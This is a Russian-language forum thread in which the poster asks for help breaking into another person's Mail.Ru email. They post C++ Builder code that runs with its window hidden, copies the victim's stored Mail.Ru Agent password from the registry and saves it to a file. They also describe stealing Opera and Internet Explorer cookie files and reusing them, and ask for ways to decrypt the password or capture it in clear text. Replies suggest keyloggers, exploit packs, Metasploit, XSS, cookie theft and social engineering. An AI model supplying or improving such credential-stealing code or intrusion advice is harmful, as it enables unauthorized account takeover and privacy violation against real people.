Привет. Я имею возможность запустить программу на компе чела, мыло которого хочу взломать. Его мыло, ну к примеру [email protected] и он использует Mail.Ru анент 5.2 . В более ранних версиях майл агента можно было легко расшифровать пароль, но в этой версии что то непонятно как его расшифровать. Или как можно использовать этот зашифрованный пароль? Ситуация такая. Я создал код на Borland C++ Builder, который копирует содержимое раздела в реестре, отвечающего за его мыло. Вот код: //--------------------------------------------------------------------------- #include <vcl.h> #pragma hdrstop #include <stdio.h> #include <stdlib.h> #include <malloc.h> #include "Unit1.h" //--------------------------------------------------------------------------- #pragma package(smart_init) #pragma resource "*.dfm" TForm1 *Form1; const char *RegKey = "Software\\Mail.Ru\\Agent\\magent_logins"; //--------------------------------------------------------------------------- __fastcall TForm1::TForm1(TComponent* Owner) : TForm(Owner) { int t = 0; TRegistry *reg = new TRegistry; reg->OpenKey(RegKey,true); void *p = malloc(60); if (t==0) {t = reg->ReadBinaryData("000#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("001#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("002#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("003#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("004#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("005#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("006#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("007#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("008#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("009#[email protected]",p,60);} if (t==0) {t = reg->ReadBinaryData("010#[email protected]",p,60);} char *x = (char *) p; for (int i = 0; i<=t; i++) { if (x==0) x = 1; } Memo1->Clear(); Memo1->Lines->Add(x); Memo1->Lines->SaveToFile("C:\\res.dat"); free(p); delete reg; reg = NULL; } //--------------------------------------------------------------------------- void __fastcall TForm1::FormPaint(TObject *Sender) { Hide(); } //--------------------------------------------------------------------------- Ну в общем я украл этот пароль, вставил эти 48 байтов в свой реестр в эту же ветку реестра и в эту же учетную запись (только на своем компе). Но майл агент все равно требует ввести пароль.. :-( Видимо агент еще с чем то взаимодействует. Но если бы я смог расшифровать этот шифрованый пароль, то я бы взломал его мыло. Хэлм ми, плиз. :'( хны. Дайте какие нибудь полезные коды, или расскажите способы как можно украсть этот пароль в незашифрованном виде что-ли.... Я ведь имею возможность запустить на его компе любую программу.
содержимое зашифр. пароля такое (в шестнадцатеричном виде): 6D 1B E3 D9 C3 6F 73 42 5D 71 56 77 CE B5 45 53 E7 BE E9 19 12 39 98 42 (6C 74 46 0D 0A) Те последние 5 байтов которые указаны в скобках - это сама моя программа добавила их, они к паролю не относятся. То есть получается 8 х 3 = 24 байта зашифрованного пароля. ;-)
Еще добавлю, к теме взлома... Он пользуется Opera (браузер такой). Я своровал у него файл cookies4.dat и вставил в свою оперу, его кукисы стали мне доступны. Все параметры страниц которые он посещал мне доступны (язык, цвет фона и т.д.). Даже удалось закачать файл с сайта www.bestreferat.ru по секретной ссылке в кукиесе. Но файла wand.dat у него не было. Это значит что пароли автоматически не сохранялись в его компе. :-( Видимо пароли он вводил вручную. Далее, я своровал кукис от интернет експлорера (Internet Explorer), но там тоже пароль не сохранен.
Соц. инженерия, физический доступ к компу, или в гугл вбей "связка эксплойтов" почитай, или на отечате поищи мануалы про metasploit framework.
metasploit framework есть в BackTrack 2.0 - 3.0 Можно купить этот диск на сайте www.knoppix.ru А кейлоггер можно установить такими путями: взлома сервера через файрволл (прога firewalk). Использовать проги для взлома и мгновенного обмена сообщениями. Передача через email. Соц. инженерия (подмена оригинальных сайтов), XSS (межсайтовый скриптинг), кража Cookies. Ну и конечно же физический доступ.